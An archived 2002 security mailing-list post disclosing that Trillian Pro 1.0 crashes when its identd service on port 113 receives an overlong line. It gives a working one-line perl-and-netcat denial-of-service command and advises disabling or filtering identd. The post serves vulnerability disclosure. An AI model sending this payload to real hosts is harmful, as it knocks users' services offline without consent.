trillian DoS: trillian 1.0 pro also vulnerable

From: Jose Nazario (joseat_private)
Date: Wed Sep 18 2002 - 11:08:58 PDT

Next message: Pidgorny, Slav: "Web browser certificate Validation flaw: Netscape, Mozilla, MSIE vulnerable - still?"

Previous message: Peter J. Holzer: "Re: OpenSSH 3.4p1 Privsep"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

followup to Lance Fitz-Herbert (aka phrizer)'s find earlier today.
trillian pro 1.0 is also vulnerable to the DoS. no need to run C code,
perl and netcat do it:

	perl -e 'print "A"x450; print "\n"' | nc <ip> 113

same precautions ... disable (or filter) identd on that host. enjoy.

___________________________
jose nazario, ph.d.			joseat_private
					http://www.monkey.org/~jose/

Next message: Pidgorny, Slav: "Web browser certificate Validation flaw: Netscape, Mozilla, MSIE vulnerable - still?"
Previous message: Peter J. Holzer: "Re: OpenSSH 3.4p1 Privsep"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Sep 18 2002 - 17:05:07 PDT